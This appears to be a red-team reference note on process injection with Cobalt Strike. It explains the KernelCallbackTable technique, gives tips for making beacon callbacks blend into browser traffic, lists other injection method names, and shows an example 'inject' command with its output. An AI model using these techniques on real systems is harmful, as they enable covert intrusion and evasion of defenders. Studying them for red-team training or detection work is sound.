Secondary Categories: 02 - Malware Links: Cobalt Strike

Description:

It's generally best to run your shellcode inside your own process's memory (no remote handle is needed and there are fewer cross-process indicators). If you do have to inject into another process, pick one that already generates network traffic (a browser, for example) so the beacon's callbacks blend in with what that process normally does.

KernelCallbackTable Method

KernelCallbackTable is not a WinAPI function but a pointer in the PEB to user32.dll's table of callback functions (__fnCOPYDATA, __fnDWORD, ...) that the kernel dispatches window messages through. Injection works by writing the payload into the target, writing a modified copy of the table whose __fnCOPYDATA entry points at the payload, repointing PEB->KernelCallbackTable at that copy, and then sending a WM_COPYDATA message to one of the target's windows; the dispatcher then calls the payload inside the remote process. FinFisher/FinSpy and Lazarus have used this method in their malware campaigns.

The table is only populated once user32.dll is loaded, so the target must be a GUI process. The simplest way to get this injection method working is to spawn a sacrificial GUI process (notepad.exe, for example) and inject into that.

Caro-Kann

Transacted Hollowing

Process Hollowing

Process Herpaderping

Process Ghosting

Process Doppelganging

Early Cascade

Pool Party

Early Bird

Remote Thread Hijacking

MockingJay

DirtyVanity

AddressOfEntryPoint

Asynchronous Procedure Calls

Reflective DLL Injection

SetWindowsHookEx

Atom Bombing

IAT Hooking

WriteProcessMemory

CreateRemoteThread

NtMapViewOfSection

PROPgate

TLS Callback

LoadLibrary

Function Stomping

Built In Cobalt Strike Methods

Process injection lets us run our shellcode inside a process of our choosing. You can only inject into a process you can obtain a handle to with enough rights to write to its memory and execute code in it, so protected processes, other users' processes and higher-integrity processes are out of reach from an unprivileged beacon.

  • shinject [pid] [arch] [file] injects raw shellcode read from a binary file on your attacking machine.
  • inject [pid] [arch] [listener] injects a full beacon payload for the given listener.

If we want to inject a TCP beacon payload into a process we could do the following:

beacon> inject 4464 x64 tcp-local
[*] Tasked beacon to inject windows/beacon_bind_tcp (127.0.0.1:4444) into 4464 (x64)
[+] established link to child beacon: 10.10.123.102

^^^^ where tcp-local is the name of the listener; the child is a bind TCP beacon on 127.0.0.1:4444 that the parent beacon links to ^^^^

As with any injected beacon, if the target process exits (for example the user closes the application or logs off) the child beacon dies with it and the link is lost.


Resources: